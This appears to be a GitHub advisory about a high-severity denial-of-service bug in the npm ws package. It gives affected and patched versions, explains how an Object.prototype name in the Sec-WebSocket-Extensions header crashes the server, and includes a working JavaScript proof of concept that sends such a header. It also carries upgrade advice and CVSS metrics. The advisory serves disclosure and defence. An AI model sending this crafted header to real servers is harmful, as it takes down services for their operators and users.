
Denial of Service in ws

High severity · GitHub Reviewed · Published Jun 4, 2019 to the GitHub Advisory Database · Updated Mar 23, 2023

Package

npm ws (npm)

Affected versions

>= 0.2.6, < 1.1.5
>= 2.0.0, < 3.3.1

Patched versions

1.1.5
3.3.1

Description

Affected versions of ws crash when they receive a specially crafted Sec-WebSocket-Extensions header whose extension or parameter names are Object.prototype property names (for example constructor). The header parser kept parsed extensions and their parameters in plain JavaScript objects and treated any name that already resolved to a value as an entry it had inserted earlier, so an inherited prototype property was mistaken for a parser-created array; the resulting TypeError was thrown while handling the handshake and, unless the application caught it, terminated the Node.js process. No authentication or prior WebSocket session is needed: any client that can reach the listening port can trigger the crash with a single upgrade request.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

// Start a ws server on port 3000, then open a raw TCP connection to it and
// send a handcrafted HTTP upgrade request. Everything is an ordinary
// handshake except Sec-WebSocket-Extensions, whose value is an
// Object.prototype property name.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor' (same name as a parameter instead of an extension)

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'  // joined with '\r\n' below, this yields the blank line that terminates the headers
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();        // drain whatever the server sends back
    socket.write(request);  // on an affected version the server process throws and exits
  });
});

Recommendation

Update to version 3.3.1 or later, or to 1.1.5 or later if you must stay on the 1.x line. Because ws is commonly pulled in transitively (by socket.io, engine.io, and many dev servers), check every copy in the dependency tree with `npm ls ws` rather than only the version in your own package.json.

References

Reviewed Jun 4, 2019
Published to the GitHub Advisory Database Jun 4, 2019
Last updated Mar 23, 2023

Severity

High (7.5 / 10)

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

No known CVE

GHSA ID

GHSA-5v72-xg48-5rpm

Source code

No known source code